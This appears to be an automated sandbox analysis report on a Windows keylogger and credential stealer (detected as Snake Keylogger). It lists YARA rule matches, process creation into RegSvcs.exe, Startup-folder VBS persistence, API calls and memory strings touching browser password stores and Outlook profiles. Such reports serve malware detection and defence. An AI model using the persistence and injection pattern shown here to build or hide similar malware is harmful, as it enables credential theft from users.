Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B137B5 GetLastError,FormatMessageW,

0_2_00B137B5

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle,	0_2_00B010BF
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00B016C3
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FC10BF AdjustTokenPrivileges,CloseHandle,	2_2_00FC10BF
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00FC16C3

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B151CD

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B2A67C

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00B1648E

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00AA42A2

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

File created: C:\Users\user\AppData\Local\Thebesian

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

File created: C:\Users\user\AppData\Local\Temp\autBCB7.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"

Source: oagkiAhXgZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000329F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: oagkiAhXgZ.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

File read: C:\Users\user\Desktop\oagkiAhXgZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\oagkiAhXgZ.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Process created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Process created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: oagkiAhXgZ.exe

Static file information: File size 1111040 > 1048576

Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oagkiAhXgZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: oagkiAhXgZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp

Source: oagkiAhXgZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oagkiAhXgZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oagkiAhXgZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oagkiAhXgZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oagkiAhXgZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA42DE

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC0A76 push ecx; ret	0_2_00AC0A89
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F80A76 push ecx; ret	2_2_00F80A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0275891E pushad ; iretd	3_2_0275891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02758C2F pushfd ; iretd	3_2_02758C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02758DDF push esp; iretd	3_2_02758DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012668F2 push 00000001h; ret	7_2_01266900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01AD2DC0 pushfd ; retf	7_2_01AD2DC1

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

File created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ABF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00ABF98E
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00B31C41
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00F7F98E
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00FF1C41

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
